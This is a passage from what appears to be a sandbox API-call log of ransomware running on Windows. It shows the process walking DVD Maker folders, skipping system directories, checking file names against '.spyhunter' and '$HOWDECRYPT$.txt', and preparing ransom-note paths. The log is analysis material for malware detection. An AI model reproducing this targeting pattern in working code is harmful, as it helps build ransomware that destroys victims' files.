Information") returned 25 [0092.955] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png") returned 95 [0092.955] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.955] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.955] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.955] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\NavigationUp_SelectionSubpicture.png") returned 95 [0092.955] GetProcessHeap () returned 0x2c0000 [0092.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x100) returned 0x381a90 [0092.955] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15a8) returned 0x2c310e0 [0092.955] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.955] lstrcmpiW (lpString1="reflect.png", lpString2="Windows") returned -1 [0092.955] lstrlenW (lpString="Windows") returned 7 [0092.955] lstrcmpiW (lpString1="reflect.png", lpString2="$Recycle.bin") returned 1 [0092.955] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.955] lstrcmpiW (lpString1="reflect.png", lpString2="System Volume Information") returned -1 [0092.956] lstrlenW (lpString="System Volume Information") returned 25 [0092.956] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png") returned 70 [0092.956] StrStrIW (lpFirst="reflect.png", lpSrch=".spyhunter") returned 0x0 [0092.956] lstrcmpW (lpString1="reflect.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.956] lstrcmpW (lpString1="reflect.png", lpString2="_uninstalling_.png") returned 1 [0092.956] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\reflect.png") returned 70 [0092.956] GetProcessHeap () returned 0x2c0000 [0092.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e488 [0092.956] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b0) returned 0x2c310e0 [0092.956] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.956] lstrcmpiW (lpString1="vistabg.png", lpString2="Windows") returned -1 [0092.956] lstrlenW (lpString="Windows") returned 7 [0092.956] lstrcmpiW (lpString1="vistabg.png", lpString2="$Recycle.bin") returned 1 [0092.956] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.956] lstrcmpiW (lpString1="vistabg.png", lpString2="System Volume Information") returned 1 [0092.956] lstrlenW (lpString="System Volume Information") returned 25 [0092.956] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png") returned 70 [0092.956] StrStrIW (lpFirst="vistabg.png", lpSrch=".spyhunter") returned 0x0 [0092.956] lstrcmpW (lpString1="vistabg.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.956] lstrcmpW (lpString1="vistabg.png", lpString2="_uninstalling_.png") returned 1 [0092.956] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\vistabg.png") returned 70 [0092.956] GetProcessHeap () returned 0x2c0000 [0092.956] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e128 [0092.956] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15b8) returned 0x2c310e0 [0092.957] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.957] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.958] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\$HOWDECRYPT$.txt") returned 75 [0092.958] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Rectangles\\$HOWDECRYPT$.txt") returned 75 [0092.958] GetProcessHeap () returned 0x2c0000 [0092.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346808 [0092.958] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c0) returned 0x2c310e0 [0092.958] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.958] lstrcmpiW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.958] lstrlenW (lpString="Windows") returned 7 [0092.958] lstrcmpiW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.958] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.958] lstrcmpiW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.958] lstrlenW (lpString="System Volume Information") returned 25 [0092.958] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned 80 [0092.958] StrStrIW (lpFirst="rectangle_babypink_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.958] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.958] lstrcmpW (lpString1="rectangle_babypink_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.958] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_babypink_Thumbnail.bmp") returned 80 [0092.958] GetProcessHeap () returned 0x2c0000 [0092.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f058 [0092.958] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15c8) returned 0x2c310e0 [0092.959] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.959] lstrcmpiW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.959] lstrlenW (lpString="Windows") returned 7 [0092.959] lstrcmpiW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.959] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.959] lstrcmpiW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.959] lstrlenW (lpString="System Volume Information") returned 25 [0092.959] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned 77 [0092.959] StrStrIW (lpFirst="rectangle_glass_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.959] lstrcmpW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.959] lstrcmpW (lpString1="rectangle_glass_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.959] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_glass_Thumbnail.bmp") returned 77 [0092.959] GetProcessHeap () returned 0x2c0000 [0092.959] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3781c0 [0092.959] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d0) returned 0x2c310e0 [0092.959] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.959] lstrcmpiW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.959] lstrlenW (lpString="Windows") returned 7 [0092.959] lstrcmpiW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.959] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.959] lstrcmpiW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.959] lstrlenW (lpString="System Volume Information") returned 25 [0092.959] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned 82 [0092.959] StrStrIW (lpFirst="rectangle_highlights_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.960] lstrcmpW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.960] lstrcmpW (lpString1="rectangle_highlights_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.960] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_highlights_Thumbnail.bmp") returned 82 [0092.960] GetProcessHeap () returned 0x2c0000 [0092.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34ef68 [0092.960] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15d8) returned 0x2c310e0 [0092.960] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.960] lstrcmpiW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.960] lstrlenW (lpString="Windows") returned 7 [0092.960] lstrcmpiW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.960] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.960] lstrcmpiW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.960] lstrlenW (lpString="System Volume Information") returned 25 [0092.960] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned 83 [0092.960] StrStrIW (lpFirst="rectangle_performance_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.960] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.960] lstrcmpW (lpString1="rectangle_performance_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.960] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_performance_Thumbnail.bmp") returned 83 [0092.960] GetProcessHeap () returned 0x2c0000 [0092.960] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x34f508 [0092.960] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e0) returned 0x2c310e0 [0092.960] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.960] lstrcmpiW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.961] lstrlenW (lpString="Windows") returned 7 [0092.961] lstrcmpiW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.961] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.961] lstrcmpiW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.961] lstrlenW (lpString="System Volume Information") returned 25 [0092.961] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned 77 [0092.961] StrStrIW (lpFirst="rectangle_photo_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.961] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.961] lstrcmpW (lpString1="rectangle_photo_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.961] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_photo_Thumbnail.bmp") returned 77 [0092.961] GetProcessHeap () returned 0x2c0000 [0092.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3782a8 [0092.961] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x15e8) returned 0x2c310e0 [0092.961] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.961] lstrcmpiW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="Windows") returned -1 [0092.961] lstrlenW (lpString="Windows") returned 7 [0092.961] lstrcmpiW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0092.961] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.961] lstrcmpiW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0092.961] lstrlenW (lpString="System Volume Information") returned 25 [0092.961] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned 77 [0092.961] StrStrIW (lpFirst="rectangle_plain_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0092.961] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.961] lstrcmpW (lpString1="rectangle_plain_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0092.962] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_plain_Thumbnail.bmp") returned 77 [0092.962] GetProcessHeap () returned 0x2c0000 [0092.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x377f08 [0093.001] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0093.001] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.002] lstrcmpiW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.002] lstrlenW (lpString="Windows") returned 7 [0093.002] lstrcmpiW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.002] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.002] lstrcmpiW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.002] lstrlenW (lpString="System Volume Information") returned 25 [0093.002] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned 79 [0093.002] StrStrIW (lpFirst="rectangle_postage_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.002] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.002] lstrcmpW (lpString1="rectangle_postage_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.002] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_postage_Thumbnail.bmp") returned 79 [0093.002] GetProcessHeap () returned 0x2c0000 [0093.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377e20 [0093.002] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0093.002] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.002] lstrcmpiW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.002] lstrlenW (lpString="Windows") returned 7 [0093.002] lstrcmpiW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.002] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.002] lstrcmpiW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.002] lstrlenW (lpString="System Volume Information") returned 25 [0093.002] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned 81 [0093.002] StrStrIW (lpFirst="rectangle_scrapbook_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.002] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.002] lstrcmpW (lpString1="rectangle_scrapbook_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.002] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_scrapbook_Thumbnail.bmp") returned 81 [0093.002] GetProcessHeap () returned 0x2c0000 [0093.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f238 [0093.003] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0093.003] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.003] lstrcmpiW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.003] lstrlenW (lpString="Windows") returned 7 [0093.003] lstrcmpiW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.003] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.003] lstrcmpiW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.003] lstrlenW (lpString="System Volume Information") returned 25 [0093.003] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned 82 [0093.003] StrStrIW (lpFirst="rectangle_specialocc_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.003] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.003] lstrcmpW (lpString1="rectangle_specialocc_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.003] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_specialocc_Thumbnail.bmp") returned 82 [0093.003] GetProcessHeap () returned 0x2c0000 [0093.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34ee78 [0093.003] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0093.003] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.003] lstrcmpiW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.003] lstrlenW (lpString="Windows") returned 7 [0093.003] lstrcmpiW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.003] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.003] lstrcmpiW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.003] lstrlenW (lpString="System Volume Information") returned 25 [0093.003] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned 78 [0093.003] StrStrIW (lpFirst="rectangle_travel_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.004] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.004] lstrcmpW (lpString1="rectangle_travel_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_travel_Thumbnail.bmp") returned 78 [0093.004] GetProcessHeap () returned 0x2c0000 [0093.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3780d8 [0093.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0093.004] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.004] lstrcmpiW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="Windows") returned -1 [0093.004] lstrlenW (lpString="Windows") returned 7 [0093.004] lstrcmpiW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="$Recycle.bin") returned 1 [0093.004] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.004] lstrcmpiW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="System Volume Information") returned -1 [0093.004] lstrlenW (lpString="System Volume Information") returned 25 [0093.004] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned 82 [0093.004] StrStrIW (lpFirst="rectangle_widescreen_Thumbnail.bmp", lpSrch=".spyhunter") returned 0x0 [0093.004] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.004] lstrcmpW (lpString1="rectangle_widescreen_Thumbnail.bmp", lpString2="_uninstalling_.png") returned 1 [0093.004] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\rectangle_widescreen_Thumbnail.bmp") returned 82 [0093.004] GetProcessHeap () returned 0x2c0000 [0093.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x34f148 [0093.004] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0093.004] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0093.004] lstrcmpiW (lpString1="ResizingPanels", lpString2="Windows") returned -1 [0093.004] lstrlenW (lpString="Windows") returned 7 [0093.004] lstrcmpiW (lpString1="ResizingPanels", lpString2="$Recycle.bin") returned 1 [0093.005] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.005] lstrcmpiW (lpString1="ResizingPanels", lpString2="System Volume Information") returned -1 [0093.005] lstrlenW (lpString="System Volume Information") returned 25 [0093.005] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels") returned 62 [0093.005] lstrcmpW (lpString1="ResizingPanels", lpString2=".") returned 1 [0093.005] lstrcmpW (lpString1="ResizingPanels", lpString2="..") returned 1 [0093.005] GetProcessHeap () returned 0x2c0000 [0093.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0093.005] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*") returned 64 [0093.005] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0093.012] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0093.012] lstrlenW (lpString="Windows") returned 7 [0093.012] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0093.012] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.012] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0093.012] lstrlenW (lpString="System Volume Information") returned 25 [0093.012] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\.") returned 64 [0093.012] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.012] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.012] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0093.012] lstrlenW (lpString="Windows") returned 7 [0093.012] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0093.012] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.012] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0093.012] lstrlenW (lpString="System Volume Information") returned 25 [0093.012] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\..") returned 65 [0093.012] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.012] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.012] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.012] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0093.012] lstrlenW (lpString="Windows") returned 7 [0093.013] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0093.013] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.013] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0093.013] lstrlenW (lpString="System Volume Information") returned 25 [0093.013] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png") returned 80 [0093.013] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0093.013] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.013] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0093.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\1047x576black.png") returned 80 [0093.013] GetProcessHeap () returned 0x2c0000 [0093.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x34f148 [0093.013] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0093.013] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0093.013] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="Windows") returned -1 [0093.013] lstrlenW (lpString="Windows") returned 7 [0093.013] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="$Recycle.bin") returned 1 [0093.013] lstrlenW (lpString="$Recycle.bin") returned 12 [0093.013] lstrcmpiW (lpString1="203x8subpicture.png", lpString2="System Volume Information") returned -1 [0093.013] lstrlenW (lpString="System Volume Information") returned 25 [0093.013] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png") returned 82 [0093.013] StrStrIW (lpFirst="203x8subpicture.png", lpSrch=".spyhunter") returned 0x0 [0093.013] lstrcmpW (lpString1="203x8subpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0093.013] lstrcmpW (lpString1="203x8subpicture.png", lpString2="_uninstalling_.png") returned 1 [0093.013] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\203x8subpicture.png") returned 82 [0093.013] GetProcessHeap () returned 0x2c0000 [0093.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 